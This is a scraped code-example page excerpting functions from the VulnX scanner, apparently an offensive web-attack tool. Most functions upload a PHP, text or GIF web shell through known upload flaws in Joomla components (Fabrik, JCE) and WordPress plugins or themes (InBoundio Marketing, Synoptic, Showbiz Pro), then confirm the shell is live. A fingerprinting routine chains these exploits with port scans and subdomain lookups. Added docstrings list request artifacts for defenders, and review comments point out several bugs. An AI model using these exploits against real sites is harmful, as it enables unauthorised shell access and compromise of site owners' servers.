    # A positive only means "Tig" occurred somewhere in that reply.
    if re.findall(r'Tig', response):
        print(' %s Com Media             %s    %s' %
              (que, vulnexploit, path_shell))
    else:
        print(' %s Com Media             %s' % (que, failexploit))
Exemplo n.º 23
def joomla_fabrik2_d(url, headers, timeout):
    """Send a text file to the Fabrik ``ajax_upload`` task and look for a marker.

    Posts ./shell/VulnX.txt as form field ``file``, then fetches a second URL
    and reports success when the text "Tig" appears in the reply. The outcome
    is printed and nothing is returned.

    Defender note: POSTs to index.php with option=com_fabrik and
    method=ajax_upload are the request artifact of this probe.
    """
    # Mutates the caller's dict; the local name is rebound to a new dict below.
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

    headers = {"content-type": ["form-data"]}
    fieldname = 'file'
    shell = open('./shell/VulnX.txt', 'rb')  # handle is never closed here
    data = {
        fieldname: shell,
    }
    # The POST result is stored but never inspected.
    content = vxpost(endpoint, data, headers, timeout)
    # The check URL is the full endpoint string, query included, plus a file path.
    path_shell = endpoint + "/images/XAttacker.txt"
    response = vxget(path_shell, headers, timeout)
    # A positive only means "Tig" occurred somewhere in that reply.
    if re.findall(r'Tig', response):
        print(' %s Com Fabrik2            %s    %s' %
              (que, vulnexploit, path_shell))
    else:
        print(' %s Com Fabrik2            %s' % (que, failexploit))
Exemplo n.º 24
def wp_inboundiomarketing(url, headers):
    """Probe the InBoundio Marketing CSV uploader for arbitrary PHP upload.

    Two-argument variant: the timeout passed to both requests is fixed at 3
    and the result is only printed. It posts ./shell/VulnX.php as field
    ``file`` to csv_uploader.php and then looks for "Vuln X" in the plugin's
    uploaded_csv directory.

    Defender note: POSTs to
    wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php and
    a VulnX.php file in the uploaded_csv folder are the artifacts of this
    probe.
    """
    endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
    shell = open('./shell/VulnX.php', 'rb')  # handle is never closed here
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {
        'file': shell,
    }
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    # Variable name is left over from the Wysija check; it holds this plugin's result.
    check_wysija = re.findall("Vuln X", res)
    if check_wysija:
        print('%s [%s+%s] InBoundio Marketing%s ------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
    else:
        print('%s [%s-%s] InBoundio Marketing%s ------- %s FAIL%s' %
              (W, R, W, W, R, W))
Exemplo n.º 25
def domain_info(subdomains):
    """Print and record the domains and first IP pagesinventory.com lists for ``url``.

    The module-level ``url`` is appended to the search query as-is (no URL
    encoding) and is therefore disclosed to that third-party service. Each
    distinct domain and the first IP are also added to ``subdomains`` through
    its ``add`` method.
    """
    print(' %s Search for SubDomains' % run)
    page = vxget("https://www.pagesinventory.com/search/?s=" + url, headers, timeout)
    # Scrape the domain and IP links out of the result table.
    domain_hits = re.compile(r'<td><a href=\"\/domain\/(.*?).html\">').findall(page)
    ip_hits = re.compile(r'<a href=\"/ip\/(.*?).html\">').findall(page)
    # Keep first-seen order and record each new domain as it is found.
    domains = []
    for name in domain_hits:
        if name in domains:
            continue
        domains.append(name)
        subdomains.add('domain : '+name)
    print(' %s SubDomains : %s ' % (good, " \n                  ".join(domains)))
    # Only the first IP link is reported, and only when it is non-empty.
    if ip_hits and ip_hits[0]:
        first_ip = ip_hits[0]
        print(' %s IP : %s' % (good, first_ip))
        subdomains.add('ip : '+first_ip)
    print("-----------------------------------------------")
Exemplo n.º 26
def wp_synoptic(url, headers, timeout, vulnresults):
    """Probe the Synoptic theme's avatar uploader for arbitrary PHP upload.

    Posts ./shell/VulnX.php as field ``qqfile`` to the theme's upload.php,
    requests wp-content/uploads/markets/avatars/VulnX.php, and treats
    "Vuln X" in that reply as success. The outcome is printed and added to
    ``vulnresults``.

    Defender note: POSTs to
    wp-content/themes/synoptic/lib/avatarupload/upload.php and a VulnX.php
    file under uploads/markets/avatars/ are the artifacts of this probe.
    """
    endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
    # Local payload file; the handle is never closed in this block.
    shell = open('./shell/VulnX.php', 'rb')
    field = "qqfile"
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {field: shell}
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, timeout)
    check_synoptic = re.findall("Vuln X", res)

    if check_synoptic:
        print(' %s Synoptic              %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Synoptic -- Shell:' + dump_data)
    else:
        print(' %s Synoptic              %s' % (que, failexploit))
        vulnresults.add('[FAILED] Synoptic')
Exemplo n.º 27
def wp_synoptic(url, headers):
    """Probe the Synoptic theme's avatar uploader for arbitrary PHP upload.

    Two-argument variant: the timeout passed to both requests is fixed at 3
    and the result is only printed. It posts ./shell/VulnX.php as field
    ``qqfile`` to the theme's upload.php and then looks for "Vuln X" at
    wp-content/uploads/markets/avatars/VulnX.php.

    Defender note: POSTs to
    wp-content/themes/synoptic/lib/avatarupload/upload.php and a VulnX.php
    file under uploads/markets/avatars/ are the artifacts of this probe.
    """
    endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
    # Local payload file; the handle is never closed in this block.
    shell = open('./shell/VulnX.php', 'rb')
    field = "qqfile"
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {field: shell}
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    check_synoptic = re.findall("Vuln X", res)

    if check_synoptic:
        print('%s [%s+%s] Synoptic%s ----------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
              (G, W, B, W, dump_data, W))
    else:
        print('%s [%s-%s] Synoptic%s ----------- %s FAIL%s' %
              (W, R, W, W, R, W))
Exemplo n.º 28
def joomla_comjce(url, headers):
    """Probe the JCE image manager upload form on a Joomla site.

    Posts ./shell/VulnX.gif to the com_jce imgmanager form with an
    ``upload-dir`` of ``./../../``, then requests /VulnX.gif under ``url`` and
    reports success when the text "/image/gif/" appears in the reply. The
    outcome is printed and nothing is returned.

    Defender note: POSTs to index.php with option=com_jce and
    plugin=imgmanager, and a VulnX.gif file in the site root, are the
    artifacts of this probe.
    """
    # Mutates the dict the caller passed in.
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
    data = {
        'upload-dir': './../../',
        'upload-overwrite': 0,
        # Handle is opened inline and never closed in this block.
        'Filedata': [open('./shell/VulnX.gif', 'rb')],
        'action': 'Upload'
    }
    # The POST result is stored but never inspected.
    content = vxpost(endpoint, data, headers, 15)
    # The socket is created but not read from, written to or closed below.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    # NOTE(review): socket.connect accepts a single address argument; with two
    # positional arguments this call is expected to raise TypeError, in which
    # case the lines below never run.
    sock.connect(url, 80)
    path_shell = url + "/VulnX.gif"
    res = vxget(path_shell, headers, 3)
    if re.findall(r'/image/gif/', res):
        print('%s [%s+%s] Com Jce%s ------- %s VULN%s' % (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, path_shell, W))
    else:
        print('%s [%s-%s] Com Jce%s ------- %s FAIL%s' % (W, R, W, W, R, W))
Exemplo n.º 29
def wp_showbiz(url, headers):
    """Probe the Showbiz Pro ``update_plugin`` AJAX action for arbitrary PHP upload.

    Two-argument variant: the POST uses a fixed timeout argument of 3 and the
    result is only printed. It posts ./shell/VulnX.php to
    /wp-admin/admin-ajax.php with action=showbiz_ajax_action and then looks
    for "Vuln X" under the plugin's temp/update_extract path.

    Defender note: admin-ajax.php POSTs carrying action=showbiz_ajax_action
    and any VulnX.php under wp-content/plugins/showbiz/temp/update_extract/
    are the artifacts of this probe. The User-Agent is picked at random from a
    fixed list, so it is not a stable indicator on its own.
    """
    endpoint = url + "/wp-admin/admin-ajax.php"

    # Nested helper: returns one entry of a hard-coded browser User-Agent list.
    def random_UserAgent():
        useragents_rotate = [
            "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
            "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
            "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
        ]
        useragents_random = random.choice(useragents_rotate)
        return useragents_random

    useragent = random_UserAgent()
    # Both header writes mutate the dict the caller passed in.
    headers['User-Agent'] = useragent
    headers['Content_Type'] = 'multipart/form-data'
    options = {
        "action": "showbiz_ajax_action",
        "client_action": "update_plugin",
        # Handle is opened inline and never closed in this block.
        "update_file": [open('./shell/VulnX.php', 'rb')]
    }
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
    # NOTE(review): the form dict is passed where the other vxget calls on this
    # page pass headers, and no timeout is given.
    res = vxget(dump_data, options)
    check_showbiz = re.findall("Vuln X", res)
    if check_showbiz:
        print('%s [%s+%s] Showbiz Pro%s ------------ %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
    else:
        print('%s [%s-%s] Showbiz Pro%s ------------ %s FAIL%s' %
              (W, R, W, W, R, W))
Exemplo n.º 30
def detect_cms():
    """Fingerprint the CMS behind ``url`` and run the checks selected by flags.

    Takes no parameters. ``url``, ``headers``, ``timeout``, the option
    flags (``webinfo``, ``domaininfo``, ``cms``, ``scanports``,
    ``exploit``), their companions (``hostinfo``, ``subdomains``,
    ``grabinfo``, ``vulnresults``) and the colour/marker strings (``W``,
    ``end``, ``que``, ``good``, ``bad``, ``run``) are all read from the
    enclosing scope.

    Three resources are fetched through ``vxget`` before any decision is
    made: ``/smiley/1.gif``, ``/rss.xml`` and the URL itself. The first
    regex in the if/elif chain that matches decides the CMS, so order
    matters (a page matching both the Joomla and WordPress patterns is
    reported as Joomla). All patterns are unanchored substring searches,
    so a page that merely mentions a product name will match.

    From the target's side, the three-request probe sequence above is the
    observable footprint of the fingerprinting step; the ``exploit``
    branches then call per-plugin checks that send further requests.
    """
    # Always 0 here, so every banner prints "Target[0]".
    # Note the name shadows the builtin id().
    id = 0
    lm = url + '/smiley/1.gif'
    lm_content = vxget(lm, headers)
    lm2 = url + '/rss.xml'
    lm2_content = vxget(lm2, headers)
    content = vxget(url, headers)
    # A commented-out `try:` was left here in the original; no exception
    # handling wraps the three fetches above.

    ############################
    #                          #
    #         joomla           #
    #                          #
    ############################
    # Joomla: match its stock media path, the com_content component name
    # or the literal "Joomla!" in the fetched page.
    if re.search(
            re.compile(
                r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!'
            ), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s %sCMS :%s Joomla' % (good, W, end))
        print('------------------------------------------------')
        # hosting / IP information, when requested
        if webinfo:
            webhosting_info(hostinfo)
        # domain / subdomain information, when requested
        if domaininfo:
            domain_info(subdomains)
        # NOTE(review): the Joomla branch calls prestashop_version(); this
        # looks like a copy-paste from the Prestashop branch -- confirm.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            prestashop_version()
        # port scan of the host part of the URL
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s     PORTS                     %sSTATUS  %sPROTO""" %
                  (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # joomla_* checks come from ./common/joomla_exploits.py (per the
        # original comment). Each is called with the shared url, headers
        # and timeout; results are printed by the helpers themselves.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME                      %sSTATUS  %sSHELL""" %
                  (W, W, W))
            joomla_comjce(url, headers, timeout)
            joomla_comedia(url, headers, timeout)
            joomla_comjdownloads(url, headers, timeout)
            joomla_comjdownloads2(url, headers, timeout)
            joomla_fabrik2(url, headers, timeout)
            joomla_fabrik2_d(url, headers, timeout)
            joomla_foxcontact(url, headers, timeout)

        ############################
        #                          #
        #         Wordpress        #
        #                          #
        ############################
    # WordPress: any of three substrings. The dot in "xmlrpc.php" is
    # unescaped, so it matches any character in that position.
    elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s %sCMS :%s Wordpress' % (good, W, end))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        if domaininfo:
            domain_info(subdomains)
        # wp_* info grabbers come from ./common/grapwp.py (per the original
        # comment). `cms` selects one category, or 'all' for every one.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            wp_version(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'themes':
            print(' %s Check CMS Info' % (run))
            wp_themes(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'user':
            print(' %s Check CMS Info' % (run))
            wp_user(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'plugins':
            print(' %s Check CMS Info' % (run))
            wp_plugin(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'all':
            print(' %s Check CMS Info' % (run))
            wp_version(url, headers, grabinfo)
            wp_themes(url, headers, grabinfo)
            wp_user(url, headers, grabinfo)
            wp_plugin(url, headers, grabinfo)
            print("-----------------------------------------------")
        # port scan of the host part of the URL
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %sPORTS                     %sSTATUS  %sPROTO""" %
                  (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # vulnx -u http://example.com -e | vulnx -u http://example --exploit
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME                      %sSTATUS  %sSHELL""" %
                  (W, W, W))
            # wp_* checks come from ./common/wp_exploits.py (per the
            # original comment); all share one call signature here.
            # NOTE(review): the wp_showbiz listing shown on this page takes
            # only (url, headers) -- confirm which version this call targets.
            wp_wysija(url, headers, timeout, vulnresults)
            wp_blaze(url, headers, timeout, vulnresults)
            wp_synoptic(url, headers, timeout, vulnresults)
            wp_catpro(url, headers, timeout, vulnresults)
            wp_cherry(url, headers, timeout, vulnresults)
            wp_dm(url, headers, timeout, vulnresults)
            wp_fromcraft(url, headers, timeout, vulnresults)
            wp_jobmanager(url, headers, timeout, vulnresults)
            wp_showbiz(url, headers, timeout, vulnresults)
            wp_shop(url, headers, timeout, vulnresults)
            wp_powerzoomer(url, headers, timeout, vulnresults)
            wp_revslider(url, headers, timeout, vulnresults)
            wp_adsmanager(url, headers, timeout, vulnresults)
            wp_inboundiomarketing(url, headers, timeout, vulnresults)
            wp_adblockblocker(url, headers, timeout, vulnresults)
            wp_levoslideshow(url, headers, timeout, vulnresults)
            print("-----------------------------------------------")

        ############################
        #                          #
        #          Drupal          #
        #                          #
        ############################
    # Drupal: product name in either case, the sites/all path, or
    # "drupal.org" (dot unescaped).
    elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Drupal' % (good))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # domain / subdomain information, when requested
        if domaininfo:
            domain_info(subdomains)
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            drupal_version()
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s     PORTS                     %sSTATUS  %sPROTO""" %
                  (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no Drupal checks are called.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME                      %sSTATUS  %sSHELL""" %
                  (W, W, W))

        ############################
        #                          #
        #        Prestashop        #
        #                          #
        ############################
    # Prestashop: product name, capitalised or lower-case.
    elif re.search(re.compile(r'Prestashop|prestashop'), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s %sCMS :%s Prestashop' % (good, W, end))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # domain / subdomain information, when requested
        if domaininfo:
            domain_info(subdomains)
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            prestashop_version()
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s     PORTS                     %sSTATUS  %sPROTO""" %
                  (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no Prestashop checks are called.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME                      %sSTATUS  %sSHELL""" %
                  (W, W, W))

        ############################
        #                          #
        #          OpenCart        #
        #                          #
        ############################
    # OpenCart: its route= query parameters, product name or theme path.
    elif re.search(
            re.compile(
                r'route=product|OpenCart|route=common|catalog/view/theme'),
            content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : OpenCart' % (good))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # domain / subdomain information, when requested
        if domaininfo:
            domain_info(subdomains)
        # Prints the heading only; no version grabber is called.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s     PORTS                     %sSTATUS  %sPROTO""" %
                  (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no OpenCart checks are called.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME                      %sSTATUS  %sSHELL""" %
                  (W, W, W))

        ############################
        #                          #
        #          Magento         #
        #                          #
        ############################
    # Magento: admin login title, the "dummy" form field, or product name.
    elif re.search(
            re.compile(
                r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'
            ), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Magento' % (good))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # domain / subdomain information, when requested
        if domaininfo:
            domain_info(subdomains)
        # Prints the heading only; no version grabber is called.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s     PORTS                     %sSTATUS  %sPROTO""" %
                  (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no Magento checks are called.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME                      %sSTATUS  %sSHELL""" %
                  (W, W, W))

        ############################
        #                          #
        #         Lokomedia        #
        #                          #
        ############################
        # NOTE(review): the print below is indented as part of the Magento
        # branch, so it runs whenever Magento matched, whether or not
        # `exploit` is set; it looks misplaced from the Lokomedia section.
        print(' %s Check Vulnerability' % (run))
    # Lokomedia, first signal: "image/gif" in the /smiley/1.gif fetch.
    # NOTE(review): depends on what vxget returns for a GIF (body text
    # vs. headers), which is not visible here -- confirm.
    elif re.search(re.compile(r'image/gif'), lm_content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Lokomedia' % (good))
        print('------------------------------------------------')
        # Unlike the other branches, this call is not gated on `domaininfo`.
        domain_info(subdomains)
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s  PORTS                     %sSTATUS  %sPROTO""" %
                  (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Printed unconditionally; no checks follow it.
        print(' %s Check Vulnerability' % (run))
    # Lokomedia, second signal: the word "lokomedia" in the /rss.xml fetch.
    elif re.search(re.compile(r'lokomedia'), lm2_content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Lokomedia' % (good))
        print('------------------------------------------------')
        # Unlike the other branches, this call is not gated on `domaininfo`.
        domain_info(subdomains)
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s  PORTS                     %sSTATUS  %sPROTO""" %
                  (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Printed unconditionally; no checks follow it.
        print(' %s Check Vulnerability' % (run))

        ############################
        #                          #
        #          Unknown         #
        #                          #
        ############################
    # No pattern matched: report "Unknown" and run only the information
    # gathering options.
    else:
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Unknown' % (bad))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # domain / subdomain information, when requested
        if domaininfo:
            domain_info(subdomains)